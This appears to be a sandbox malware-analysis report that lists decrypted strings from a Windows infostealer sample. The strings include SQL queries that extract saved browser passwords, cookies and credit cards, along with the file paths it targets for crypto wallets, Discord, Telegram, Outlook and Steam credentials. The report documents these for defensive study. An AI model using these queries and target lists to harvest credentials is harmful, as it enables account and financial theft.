                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetWindowRect
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetDesktopWindow
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetDC
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CloseWindow
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: wsprintfA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: EnumDisplayDevicesA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetKeyboardLayoutList
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CharToOemW
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: wsprintfW
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RegQueryValueExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RegEnumKeyExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RegOpenKeyExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RegCloseKey
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RegEnumValueA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CryptBinaryToStringA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CryptUnprotectData
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SHGetFolderPathA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ShellExecuteExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetOpenUrlA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetConnectA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetCloseHandle
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetOpenA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HttpSendRequestA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HttpOpenRequestA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetReadFile
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: InternetCrackUrlA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrCmpCA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrStrA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: StrCmpCW
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PathMatchSpecA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: GetModuleFileNameExA
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmStartSession
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmRegisterResources
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmGetList
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: RmEndSession
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_open
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_prepare_v2
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_step
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_text
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_finalize
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_close
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_bytes
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3_column_blob
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encrypted_key
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PATH
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: NSS_Init
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: NSS_Shutdown
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_GetInternalKeySlot
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_FreeSlot
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11_Authenticate
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: PK11SDR_Decrypt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\ProgramData\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: browser:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: profile:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: url:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: login:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: password:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: OperaGX
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Network
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: .txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: TRUE
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: FALSE
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: autofill
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT name, value FROM autofill
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: history
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: name:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: month:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: year:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: card:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Login Data
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Web Data
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: History
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: logins.json
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: formSubmitURL
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: usernameField
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encryptedUsername
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: encryptedPassword
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: guid
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: cookies.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: formhistory.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: places.sqlite
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: plugins
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Local Extension Settings
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Sync Extension Settings
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: IndexedDB
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera Stable
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Opera GX Stable
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: CURRENT
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: chrome-extension_
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: _0.indexeddb.leveldb
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Local State
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: chrome
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: opera
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: firefox
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: wallets
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %08lX%04lX%lu
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ProductName
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ProcessorNameString
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DisplayName
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DisplayVersion
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Network Info:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - IP: IP?
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Country: ISO?
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: System Summary:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - HWID:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - OS:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Architecture:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - UserName:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Computer Name:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Local Time:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - UTC:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Language:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Keyboards:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Laptop:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Running Path:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - CPU:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Threads:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Cores:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - RAM:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Display Resolution:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - GPU:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: User Agents:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Installed Apps:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: All Users:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Current User:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Process List:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: system_info.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: freebl3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: mozglue.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: msvcp140.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: nss3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: softokn3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: vcruntime140.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Temp\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: .exe
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: runas
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: open
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /c start
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %DESKTOP%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %APPDATA%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %LOCALAPPDATA%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %USERPROFILE%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %DOCUMENTS%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %PROGRAMFILES%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %PROGRAMFILES_86%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %RECENT%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.lnk
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: files
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \discord\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Local Storage\leveldb
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Telegram Desktop\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: key_datas
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: D877F783D5D3EF8C*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: map*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: A7FDF864FBC10B77*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: A92DAA6EA6F891F2*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: F8806DD0C461824F*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Telegram
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.tox
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.ini
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Password
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000001
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000002
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000003
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000004
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Outlook\accounts.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Pidgin
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \.purple\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: accounts.xml
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: dQw4w9WgXcQ
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: token:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Valve\Steam
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SteamPath
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \config\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ssfn*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: config.vdf
